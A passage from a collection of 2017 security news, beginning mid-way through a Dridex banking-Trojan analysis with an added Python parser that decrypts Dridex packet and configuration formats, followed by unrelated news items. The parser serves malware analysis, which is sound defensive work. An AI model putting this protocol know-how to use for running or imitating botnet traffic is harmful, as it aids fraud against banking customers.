The packet begins with a 16-byte key, followed by 4 bytes of information about the size of data encrypted with the previous key using RC4. Next comes a 16-byte key and data that has been encrypted with that key using RC4. After decryption we get a packet compressed with gzip.

Peer to C&C Encryption

As before, the malware uses a combination of RSA, RC4 encryption, and HTTPS to communicate with the C&C. In this case, peers work as proxy servers. An encrypted packet has the following structure: 4-byte CRC, followed by RSA_BLOB. After decrypting RSA (request packets cannot be decrypted without the C&C private key), we get a GZIP packet.

Configuration File

We have managed to obtain and decrypt the configuration file of botnet 222:

[screenshot not reproduced]

It is very similar in structure to the <settings> section from the previous version of Dridex. It begins with a 4-byte hash, which is followed by the configuration file’s sections.

struct DridexConfigSection {
BYTE SectionType;
DWORD DataSize;
BYTE Data[DataSize];
};
The sections are of the same types as in <settings>:

01h – HttpShots
02h – Formgrabber
08h – Redirects
etc.
The only thing that has changed is the encryption of strings in the configuration file – RC4 is now used.

struct EncryptedConfigString {
    BYTE RC4Key1[16];          // key used to encrypt the size field
    DWORD EncryptedSize;       // data size, RC4-encrypted with RC4Key1
    BYTE RC4Key2[16];          // key used to encrypt the data
    BYTE EncryptedData[Size];  // Size = EncryptedSize after RC4 decryption with RC4Key1
};
RC4 is also used to encrypt the data in P2P packets.
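The two layouts described above (the encrypted P2P packet body and the EncryptedConfigString record) share the same key/size/key/data structure, and the C&C packet header builds its RC4 key by XORing two equal-size blocks. The following parser is an added example written for this page; it is not code from the original article or from the Dridex samples. It assumes little-endian DWORDs, that the size field is decrypted with RC4Key1 and then read as an unsigned 32-bit integer, and that the decrypted P2P body is gzip data, as the text states. All sample input is constructed inside the block.

```python
"""Parsers for the Dridex packet layouts described above (added example)."""
import gzip
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def cnc_rc4_key(packet: bytes) -> tuple:
    """C&C packet header: BYTE key_len (0x74 in the samples), then two
    key_len-byte blocks whose XOR is the real RC4 key.
    Returns (key, offset of the packet-type byte)."""
    key_len = packet[0]
    a = packet[1:1 + key_len]
    b = packet[1 + key_len:1 + 2 * key_len]
    if len(a) != key_len or len(b) != key_len:
        raise ValueError("truncated key blocks")
    key = bytes(x ^ y for x, y in zip(a, b))
    return key, 1 + 2 * key_len


def p2p_header_ok(header: bytes) -> bool:
    """P2P header is a DWORD array whose 32-bit (wrapping) sum is zero."""
    if len(header) == 0 or len(header) % 4:
        return False
    words = struct.unpack("<%dI" % (len(header) // 4), header)
    return (sum(words) & 0xFFFFFFFF) == 0


def parse_encrypted_string(blob: bytes) -> tuple:
    """EncryptedConfigString / P2P body layout:
    RC4Key1[16] | EncryptedSize[4] | RC4Key2[16] | EncryptedData[Size]
    Returns (plaintext, number of bytes consumed)."""
    if len(blob) < 36:
        raise ValueError("blob shorter than the fixed 36-byte header")
    key1 = blob[0:16]
    size = struct.unpack("<I", rc4(key1, blob[16:20]))[0]
    key2 = blob[20:36]
    end = 36 + size
    if end > len(blob):
        raise ValueError("declared size %d exceeds available data" % size)
    return rc4(key2, blob[36:end]), end


def build_encrypted_string(key1: bytes, key2: bytes, plaintext: bytes) -> bytes:
    """Inverse of parse_encrypted_string; used only to construct test input."""
    enc_size = rc4(key1, struct.pack("<I", len(plaintext)))
    return key1 + enc_size + key2 + rc4(key2, plaintext)


def decode_p2p_payload(blob: bytes) -> bytes:
    """P2P body: same key/size/key/data layout; the RC4 plaintext is gzip."""
    compressed, _ = parse_encrypted_string(blob)
    return gzip.decompress(compressed)


def demo() -> dict:
    """Round-trip constructed samples through every parser above."""
    # Constructed keys and payload; not values taken from any real sample.
    key1, key2 = b"A" * 16, b"B" * 16
    record = build_encrypted_string(key1, key2, b"http://example.invalid/")
    text, used = parse_encrypted_string(record)
    p2p = build_encrypted_string(key2, key1, gzip.compress(b"peer list"))
    header = struct.pack("<3I", 1, 2, 0xFFFFFFFD)  # wraps to zero
    cnc = bytes([2, 0x01, 0x02, 0x03, 0x04, 0x00])  # key_len=2, type=0
    key, type_off = cnc_rc4_key(cnc)
    return {
        "config_string": text,
        "consumed": used,
        "p2p_payload": decode_p2p_payload(p2p),
        "header_ok": p2p_header_ok(header),
        "cnc_key": key,
        "cnc_type": cnc[type_off],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Because the size field is itself RC4-encrypted, a parser that trusts it before decrypting it will mis-slice the record; the bounds check in parse_encrypted_string is what keeps a corrupt or truncated capture from raising an index error deep inside the RC4 loop.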

Geographical Distribution


The developers of Dridex look for potential victims in Europe. Between January 1st and early April 2017, we detected Dridex activity in several European countries. The UK accounted for more than half (nearly 60%) of all detections, followed by Germany and France. At the same time, the malware never works in Russia, as the C&Cs detect the country via IP address and do not respond if the country is Russia.

Conclusion

In the several years that the Dridex family has existed, there have been numerous unsuccessful attempts to block the botnet’s activity. The ongoing evolution of the malware demonstrates that the cybercriminals are not about to bid farewell to their brainchild, which is providing them with a steady revenue stream. For example, Dridex developers continue to implement new techniques for evading the User Account Control (UAC) system. These techniques enable the malware to run its malicious components on Windows systems.

It can be surmised that the same people, possibly Russian speakers, are behind the Dridex and Zeus Gameover Trojans, but we do not know this for a fact. The damage done by the cybercriminals is also impossible to assess accurately. Based on a very rough estimate, it has reached hundreds of millions of dollars by now. Furthermore, given the way that the malware is evolving, it can be assumed that a significant part of the “earnings” is reinvested into the banking Trojan’s development.

The analysis was performed based on the following samples:

Dridex4 loader: d0aa5b4dd8163eccf7c1cd84f5723d48
Dridex4 bot: ed8cdd9c6dd5a221f473ecf3a8f39933


Insecure Medical devices are enlarging surface of attacks for organizations
27.5.2017 securityaffairs Cyber

A study conducted by the Ponemon Institute shows insecure Medical devices are enlarging the surface of attacks for organizations.
A study conducted by the Ponemon Institute, based on a survey of 550 individuals, shows that manufacturers and healthcare delivery organizations (HDO) are concerned about cyber attacks on medical devices.

67 percent of medical device makers and 56 percent of HDOs believe that in the next 12 months their medical devices will be targeted by hackers. Unfortunately, only 25 percent of device makers and 38 percent of HDOs believe the security features implemented in the devices can adequately protect patients and the clinicians who use them.

33% of the participants in the survey confirmed they were aware of cyber attacks that had a negative impact on patients. Attackers can mount a wide range of attacks on the devices, including ransomware attacks, denial-of-service (DoS) attacks, and hijacking of medical devices.

The most disconcerting aspect of the research is that only 17 percent of device manufacturers and 15 percent of HDOs have adopted the necessary countermeasures to prevent attacks. 40 percent of HDOs and manufacturers admitted they haven’t adopted anything to prevent attacks.

Unsecured medical devices represent an entry point for hackers into hospitals and other healthcare organizations. The bad news is that the majority of the participants in the survey believe securing medical devices is very difficult.

The study revealed that the security practices in place are not effective: manufacturers and HDOs lack practices such as security testing throughout the SDLC, code review and debugging systems, and dynamic application security testing. The survey found that 36 percent of manufacturers and 45 percent of HDOs do not test devices. Companies that did test their medical devices admitted finding vulnerabilities and even malware in their systems.


“Medical device security practices in place are not the most effective. Both manufacturers and users rely upon following specified security requirements instead of more thorough practices such as security testing throughout the SDLC, code review and debugging systems and dynamic application security testing. As a result, both manufacturers and users concur that medical devices contain vulnerable code due to lack of quality assurance and testing procedures and rush to release pressures on the product development team.” states the report.

Another worrying finding of the survey is that budget increases are usually a consequence of a hacking attack.

“In many cases, budget increases to improve the security of medical devices would occur only after a serious hacking incident occurred. Device makers, on average, spend approximately $4 million on the security of their medical devices and HDOs spend an average of $2.4 million each year. As shown in Figure 9, a serious hacking incident or new regulations would influence their organizations to increase the security budget.” continues the report.


Chipotle Mexican Grill fast-food chain notified customers of a PoS malware breach
27.5.2017 securityaffairs Virus

The fast-food chain Chipotle notified users of a security breach: hackers compromised its point-of-sale terminals to steal payment card data.
The Mexican Grill fast-food chain Chipotle notified users of a data breach after hackers infected its point-of-sale terminals with malware designed to steal payment card data.

The malicious code infected systems in 47 states and Washington earlier this year from March 24 to April 18.

The list of affected Chipotle restaurants is available here.

“The investigation identified the operation of malware designed to access payment card data from cards used on point-of-sale (POS) devices at certain Chipotle restaurants between March 24, 2017 and April 18, 2017.” reads the data breach notification published by the company. “The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device. There is no indication that other customer information was affected.”


The company highlighted that not all of its locations were breached. A specific location can be checked at the following address:

https://www.chipotle.com/security#security

Users who have paid at the compromised stores should stay vigilant on their bank accounts and check any transaction involving their payment card.

The company confirmed that it has removed the malicious code from the infected systems.

“During the investigation we removed the malware, and we continue to work with cyber security firms to evaluate ways to enhance our security measures. In addition, we continue to support law enforcement’s investigation and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring.” reads the statements.

PoS system attacks are very common. This week Target, the US retail giant that suffered one of the most severe PoS system attacks, entered a settlement with the US Attorneys General and agreed to pay $18.5 million over the 2013 data breach.


Experts tracked a German hacker behind the spreading of Houdini Worm on Pastebin
27.5.2017 securityaffairs Virus

Security experts at Recorded Future have tracked a German hacker responsible for the propagation of the Houdini worm through Pastebin sites.
A German hacker who goes by the online moniker Vicswors Baghdad is responsible for the propagation of the Houdini malware on Pastebin sites.

According to the experts at Recorded Future, the same threat actor appears to be the author of an open source ransomware variant called MoWare H.F.D.

Experts at Recorded Future have observed three distinct spikes in malicious Visual Basic scripts posted on paste sites, in August, October, and in March 2017.


Most of the scripts are used to spread the Houdini worm, a threat that first appeared in 2013 and was updated in 2016.

“In early March 2017, we began to notice an increasing number of malicious VBScripts posted to paste sites. The majority of these VBScripts appeared to be Houdini. Houdini is a VBScript worm that first appeared in 2013 and was updated in 2016.” states the analysis published by Recorded Future. “The individual(s) reusing this Houdini VBScript are continually updating with new command and control servers. After further defining our search criteria, we isolated the Houdini scripts and quickly identified three distinct spikes around August, October, and March of this year.”

Recorded Future discovered 213 malicious posts on Pastebin sites involving a single domain with 105 subdomains, and the experts collected 190 hashes.

The domains and subdomains belong to a dynamic DNS provider, and direct attribution was not possible because the threat actors published the VBScript for the Houdini worm from guest accounts.

However, the experts were able to determine the registrant of one domain, microsofit[.]net: the name is “Mohammed Raad,” the associated email is “vicsworsbaghdad@gmail.com,” and the country is “Germany.”

Googling the above information, the researchers discovered a Facebook profile using identical details. According to the profile, Mohammed Raad is a member of a German cell of Anonymous and uses Vicswors Baghdad as an alias.

The researchers also highlighted that the Facebook profile includes a recent conversation related to the MoWare H.F.D ransomware.


“The Facebook profile displays a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. It appears that they are studying, testing, and possibly configuring a ransomware.” continues the analysis.

“Upon further inspection of the screenshot posted on the “vicsworsbaghdad” Facebook profile, we noticed that the ransomware being configured is an open source version available by commenting on the creator’s YouTube video. An account “Vicswors Baghdad” commented asking where he can find the file to download, to which the developer commented that they sent a private message. The account “Vicswors Baghdad” uses the same email “vicsworsbaghdad@gmail.com” as the registration of microsofit[.]net.”

Further details, including the threat actor profile, are available in the post published by Recorded Future.


Organizations Concerned About Medical Device Attacks: Study

27.5.2017 securityweek Cyber

Many manufacturers and healthcare delivery organizations (HDO) are concerned about medical device attacks, but only few have taken significant steps to address the threat, according to a study commissioned by electronic design automation solutions provider Synopsys.

The study, based on a survey of 550 individuals conducted by the Ponemon Institute, shows that 67 percent of medical device makers and 56 percent of HDOs believe an attack on the medical devices they build or use is likely to occur in the next 12 months.

In fact, roughly one-third of respondents said they were aware of cyber incidents that had a negative impact on patients, including inappropriate therapy or treatment delivery, ransomware attacks, denial-of-service (DoS) attacks, and hijacking of medical devices.

On the other hand, only 17 percent of device manufacturers and 15 percent of HDOs have taken significant steps to prevent attacks. Roughly 40 percent on both sides admitted that they haven’t done anything to prevent attacks.

Only 25 percent of device makers and 38 percent of HDOs are confident that the security mechanisms built inside devices can adequately protect patients and the clinicians who use these systems.

While mobile devices help clinicians be more efficient, approximately half of respondents believe that their use in hospitals and other healthcare organizations significantly increases security risks.

A majority of respondents believe securing medical devices is very difficult. The survey showed that many focus on security requirements instead of more efficient practices, such as security testing throughout the development lifecycle, code review, and dynamic testing.

The study shows that more than half of device manufacturers and HDOs blame the presence of vulnerable code on lack of quality assurance and testing procedures, while nearly 50 percent also blame the rush-to-release pressure on the development team, accidental coding errors, and lack of training on secure coding practices.

The study shows that 36 percent of manufacturers and 45 percent of HDOs do not test devices. Some of those that do test have admitted finding vulnerabilities and even malware.

While medical device manufacturers are most concerned about hacker attacks and the challenges posed by securing new medical technologies, service providers are more concerned about keeping up with regulatory requirements, and the medical industry’s lack of protection for patients and users.

When it comes to budget, a majority believe a serious hacking incident affecting medical devices would likely lead to a budget increase. A significant percentage of respondents also believes new regulations would also influence budget.



Researchers Release Patch for NSA-linked "EsteemAudit" Exploit

27.5.2017 securityweek BigBrothers
Security researchers at enSilo have released a patch to keep vulnerable systems protected from a recently released Windows exploit allegedly used by the National Security Agency (NSA)-linked Equation Group.

Dubbed EsteemAudit, this exploit targets a remote desktop protocol (RDP) bug and can be abused to move laterally within a compromised organization’s network, as well as to infect victims with ransomware or backdoors, or to exfiltrate sensitive information.

The exploit might not be as popular as the EternalBlue exploit, which fueled large infections such as WannaCry or Adylkuzz, but it could prove as devastating.

EsteemAudit was made public last month when the hacking group known as the Shadow Brokers decided to release a new set of exploits and tools allegedly stolen from the NSA-linked Equation Group last year. Soon after, Microsoft said the vulnerabilities had been patched in March.

The hackers initially put the tools up for auction, but decided to release some of them for free after failing to attract buyers. Last week, the Shadow Brokers announced plans to launch a subscription service and share more exploits to members for a monthly fee.

Unlike EternalBlue, which affects a variety of Windows versions, EsteemAudit only works on Windows XP and Windows Server 2003, which supposedly limits its overall impact. However, this also means that an official patch is unlikely to arrive from Microsoft, as it no longer offers support for these platform iterations.

Because of that, enSilo decided to release a persistent patch for these systems and keep users safe from attacks possibly leveraging the exploit. The decision was fueled by the fact that a large number of machines continue to use Windows XP and Server 2003, the researchers say.

“Upon login for each session, Windows will create a new instance of winlogon. The patch will be loaded into winlogon.exe (only if it is an RDP session) to perform in memory patching (hotpatching) of EsteemAudit. Any attempt to use EsteemAudit to infect the patched machine will inevitably fail,” enSilo explains.

Installing this patch, however, doesn’t render Windows XP or Server 2003 systems fully secure, as hundreds of other vulnerabilities impacting them still exist and will never be patched. This patch resolves only the vulnerability exploited by EsteemAudit and works on both x86 and x64 platform versions.

The patch is available for download on enSilo’s website and is installed by an installation program after accepting the terms of usage. Uninstallation is supported by signaling an event (which will remove the patch in memory) and unregistering the patch from loading into subsequent RDP sessions.

“The patch for Windows XP and Server 2003 supports silent installation and does not require a reboot, which helps users avoid the required downtime typically associated with patch installations. Upon patching, any attempt to use an EsteemAudit exploit to infect a patched machine will inevitably fail,” the researchers say.


Large Malvertising Campaign Delivers Array of Payloads

27.5.2017 securityweek Virus
A malvertising campaign that has been active for more than a year is using fingerprinting to target users with a variety of payloads, Malwarebytes security researchers warn.

Dubbed RoughTed, this large malvertising operation peaked in March 2017, with its domains accumulating over half a billion visits in the past 3 months alone. Unique to it is the fact that it has a broad scope, ranging from scams to exploit kits, and that it delivers payloads based on user’s operating system, browser, and geolocation.

The campaign also uses effective techniques to triage visitors and bypass ad-blockers, which explains the large success it has seen so far. RoughTed’s operators have been using the Amazon cloud infrastructure, particularly the Content Delivery Network (CDN) and multiple ad redirections from several ad exchanges, the security firm says.

With traffic coming from thousands of publishers, some of which are ranked in Alexa’s top 500 websites, the campaign blended in and made it more difficult to identify the source of malvertising, Malwarebytes’ Jérôme Segura reveals.

Upon initial detection, the campaign was redirecting to the Magnitude exploit kit, but started redirecting to the RIG exploit kit just days later. The researcher then identified the same pattern on a hundred other domains, most of which he says were purchased through the registrar EvoPlus in small batches, with a new .ru or .ua email address each time.

While analyzing the traffic for the RoughTed campaign, Segura discovered that the bulk of it was coming from video or file sharing sites closely intertwined with URL shorteners. These sites enjoy high traffic but have low standards when it comes to quality and safety of online advertising, Segura points out.

The campaign was also associated with an ad code script from advertising company Ad-Maven, which webmasters knowingly integrated into personal websites for monetization purposes. The script contains an algorithm to generate future Amazon S3 URLs, though buckets are created only for the next 3-5 days.

The code also stands out due to its fingerprinting functionality and the use of a technique called ‘canvas fingerprinting’. “The point is to profile users with great granularity and identify those that may be cheating the system by lying about their browser or geolocation,” the researcher explains.

What’s more, the redirections to RoughTed domains were found to happen even when ad-blockers such as Adblock Plus, uBlock origin or AdGuard were used. In an incident involving Google Chrome, the researcher found that the browser hijacking took place as soon as the user clicked anywhere on the first visited page.

“This malvertising campaign is quite diverse and no matter what your operating system or browser are, you will receive a payload of some kind. Perhaps this should be something for publishers to have a deep hard look at, knowing what they may be subjecting their visitors to if they decide to use those kinds of adverts,” the researcher says.

As part of the campaign, users were tricked with a fake Flash Player update that targets Mac, or with a bogus Java update for Windows, which instead is laced with adware. Bogus Chrome extensions are also part of it, leveraging the popularity of the browser, along with undesired redirections to iTunes/app store, tech support scams, or surveys and other scams.

The RoughTed campaign also redirected to exploit kits, mainly when it came to users in the US and Canada, but also those in the U.K., Italy, Spain, and Brazil. Used exploit kits included RIG, which in turn served the Ramnit banking Trojan, along with Magnitude, which eventually dropped the Cerber ransomware onto compromised systems.


G7 Demands Internet Giants Crack Down on Extremist Content

27.5.2017 securityweek BigBrothers
Taormina, Italy - The G7 nations on Friday demanded action from internet providers and social media firms against extremist content online, vowing to step up their fight against terrorism after the Manchester attack.

"The G7 calls for Communication Service Providers and social media companies to substantially increase their efforts to address terrorist content," Britain, the United States and their G7 partners said in a statement.

"We encourage industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence, and we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism," they said.

Elders at the Manchester mosque where the bomber sometimes worshipped have insisted that they preached a message of peace.

It has been suggested that he may well have been radicalized online by accessing content that is freely available from the likes of the Islamic State group.

"Make no mistake: the fight is moving from the battlefield to the internet," Prime Minister Theresa May told her G7 colleagues.

The G7 also vowed a collective effort to track down and prosecute foreign fighters dispersing from theaters of conflict such as Syria.

One prosecution was recently brought against such a fighter in Turkey, and Britain now wants help from local authorities for more prosecutions in Lebanon, Jordan and Iraq, a British government spokesperson said as the G7 countries met in Sicily.

The stepped-up cooperation comes amid fears that the Manchester bomber had been to Syria after visiting his parents' homeland of Libya.

"It is vital we do more to cooperate with our partners in the region to step up returns and prosecutions of foreign fighters," May said as she chaired a discussion on counter-terrorism in the Sicilian resort of Taormina.

"This means improving intelligence-sharing, evidence gathering and bolstering countries' police and legal processes."

European authorities are increasingly concerned about the threat posed by foreign fighters who went to join the Islamic State group but are now dispersing as the group comes under pressure on the battlefield.

According to a senior British government source, May urged the G7 countries to share police expertise and border security methods with countries where foreign fighters travel through or fight in.

Names and nationalities of foreign fighters should be shared to help their identification by different countries as they cross borders.

"When our allies find evidence, such as video or papers, of illegal activity involving foreign fighters, for example a Brit in a conflict zone, they should pass that to our authorities. It may help prosecute foreign fighters when they return," the source said.


Draft Hacking Back Bill Gets Modifications Prior to Imminent Introduction

26.5.2017 securityweek Hacking
Rep. Tom Graves (R-Ga.) has released an updated version (PDF) of his draft Active Cyber Defense Certainty (ACDC) Act, incorporating feedback from the business community, academia and cybersecurity policy experts. "I look forward to continuing the conversation and formally introducing ACDC in the next few weeks," he said yesterday.

The original discussion draft was released in March 2017.

ACDC is designed to amend the existing Computer Fraud and Abuse Act (CFAA). CFAA, enacted in 1986, currently prohibits individuals from taking any defensive actions other than preventative actions; that is, cyber defenders are only legally allowed to defend passively. ACDC would allow controlled 'active' defense -- something often called, somewhat misleadingly, 'hacking back' -- by excluding prosecution for the exempted actions under the CFAA.

The modifications now introduced are largely designed to tighten control and avoid collateral damage. For example, entities using active-defense techniques will need to report to the FBI. "A victim who uses an active cyber defense measure... must notify the FBI National Cyber Investigative Joint Task Force prior to using the measure."

Similarly, modifications make it clear that active defense restrictions against causing physical injury include financial injury; and provide additional safeguards for 'intermediate computers'. The latter term is defined as "a person or entity's computer that is not under the ownership or control of the attacker but has been used to launch or obscure the origin of the persistent cyber-attack."

These intermediate computers have always been considered the weak point in any form of hacking back -- it is not easy for anyone to be certain of the precise source of an attack, leading to the possibility that active-defense measures could be launched against an innocent target.

National Security Agency and Cyber Command head Admiral Mike Rogers is one of those with such concerns. "My concern is," he said during testimony before a House Armed Services subcommittee on Tuesday, "be leery of putting more gunfighters out in the street in the Wild West. As an individual tasked with protecting our networks, I'm thinking to myself -- we've got enough cyber actors out there already."

Perhaps in recognition of the inherent difficulties in such an Act, Graves has also introduced a sunset clause: "The exclusion from prosecution created by this Act shall expire 2 years after the date of enactment of this Act."

"Although ACDC allows a more active role in cyber defense," says an associated statement released yesterday, "it protects privacy rights by prohibiting vigilantism, forbidding physical damage or destruction of information on anyone else's computer, and preventing collateral damage by constraining the types of actions that would be considered active defense."


Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDPR (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than counterparts in France and Germany. US companies (apart from the major tech industries such as Google, Facebook and Microsoft), have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines.”



Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.

Tanium raises $100 million

With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.


Russia's Disinformation Efforts Hit 39 Countries: Researchers

26.5.2017 securityweek BigBrothers
Russia's campaign of cyberespionage and disinformation has targeted hundreds of individuals and organizations from at least 39 countries along with the United Nations and NATO, researchers said Thursday.

A report by the Citizen Lab at the University of Toronto revealed the existence of "a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society," lead researcher Ronald Deibert said.

The findings suggest that the cyber attacks on the 2016 presidential campaign of Hillary Clinton -- which US intelligence officials have attributed to Russia -- were just the tip of the iceberg.

Citizen Lab researchers said the espionage has targeted not only government, military and industry targets, but also journalists, academics, opposition figures, and activists.

Notable targets, according to the report, have included a former Russian prime minister, former high-ranking US officials, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers and chief executives of energy companies.

In a blog post, Deibert said the Russian-directed campaign follows a pattern of "phishing" attacks to obtain credentials of targets, and carefully "tainted" leaks that mix real and false information to create confusion around the true facts.

"Russia has a long history of experience with what is known as 'dezinformatsiya,' going back even to Soviet times," Deibert said.

"Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials -- 'falsehoods in a forest of facts'... is very difficult to distinguish and counter, especially when it is presented as a salacious 'leak' integrated with what otherwise would be private information."

Deibert said the researchers had no "smoking gun" that links the campaign to a particular government agency but added that "our report nonetheless provides clear evidence of overlap with what has been publicly reported by numerous industry and government reports about Russian cyber espionage."

Citizen Lab said one of the targets was US journalist David Satter, who has written extensively on corruption in Russia.

Satter's stolen e-mails were "selectively modified," and then "leaked" to give the false impression that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin, the report said.

Similar leak campaigns targeted officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam, according to the report.

UN officials and military personnel from more than a dozen countries were also targets, Citizen Lab said.

"Our hope is that in studying closely and publishing the details of such tainted leak operations, our report will help us better understand how to recognize and mitigate them," Deibert said.


Thousands of Third-Party Library Flaws Put Pacemakers at Risk

26.5.2017 securityweek Vulnerability
Researchers have conducted a detailed analysis of pacemaker systems from four major vendors and discovered many potentially serious vulnerabilities.

The fact that implantable cardiac devices such as pacemakers and defibrillators are vulnerable to hacker attacks has been known for years, and while steps have been taken to address issues, security experts still report finding flaws in these products.

WhiteScope, a company founded by Billy Rios, one of the first security researchers to analyze medical devices, recently conducted an analysis of the implantable cardiac device ecosystem architecture and implementation interdependencies, with a focus on pacemakers.

Pacemaker vulnerabilities

The analysis covered home monitoring systems, implantable devices, pacemaker programmers, and the patient support networks of four vendors. Researchers investigated each type of device and the communications between them.

Tests conducted on devices acquired from eBay showed that reverse engineering their firmware is made easy by the fact that many of them use commercial, off-the-shelf microprocessors.

In the case of home monitoring devices, researchers discovered data sheets publicly available on the Internet, allowing attackers to determine how they work and how they can be manipulated. Firmware reverse engineering is also made easy by the lack of packing, obfuscation and encryption.

Debugging functionality present in implanted devices also exposes firmware. Malicious actors could leverage these features to gain privileged access to home monitoring devices and the pacemaker programmers used by physicians to diagnose and program the actual cardiac devices.

WhiteScope has analyzed four pacemaker programmers and found that they use more than 300 third-party libraries. Of these components, 174 are known to have a total of more than 8,000 vulnerabilities.

“Despite efforts from the FDA to streamline routine cybersecurity updates, all programmers we examined had outdated software with known vulnerabilities,” Rios said in a blog post. “We believe that this statistic shows that the pacemaker ecosystem has some serious challenges when it comes to keeping systems up-to-date. No one vendor really stood out as having a better/worse update story when compared to their competitors.”

In some cases, researchers found unencrypted patient data stored on the programmers, including SSNs, names, phone numbers and medical information. Since these programmers typically use removable storage drives, it’s easy for a local attacker to mount the drive and extract the entire file system.

Another potential problem is the fact that programmers do not require any type of authentication for programming implantable cardiac devices.

The list of security holes found by experts in home monitoring devices includes the failure to map the firmware to protected memory, firmware updates not digitally signed or protected against man-in-the-middle (MitM) attacks, hardcoded credentials, unsecured external USB connections, and the usage of universal authentication tokens for pairing with the implanted device.

The vendors have not been named and the details of the vulnerabilities found by WhiteScope have not been disclosed to the public, but they have been reported to ICS-CERT, which will likely alert affected companies.


Nigerians Sentenced to Prison in U.S. Over Massive Fraud Scheme

26.5.2017 securityweek Crime
Three Nigerian nationals have been handed prison sentences totaling 235 years by a U.S. court for their role in a massive international online scheme that involved romance scams, identity theft, fraud and money laundering.

The suspects, extradited to the United States from South Africa in July 2015, are Oladimeji Seun Ayelotan, 30, who was sentenced to 95 years in prison, Rasaq Aderoju Raheem, 31, who was sentenced to 115 years, and Femi Alexander Mewase, 45, who received a 25-year sentence.

They were found guilty in early 2017 of committing mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property. Two of them were also found guilty of conspiracy to commit bank fraud and money laundering.

U.S. authorities have charged 21 individuals in this case, including from Nigeria, South Africa, Wisconsin, California and New York. Eleven members of the conspiracy have been sentenced, including Teslim Olarewaju Kiriji, a 30-year-old Nigerian man believed to be one of the leaders of the conspiracy. Kiriji was sentenced to 20 years in prison, while the others received 10 years or less. Many of the remaining suspects have already pleaded guilty to various charges.

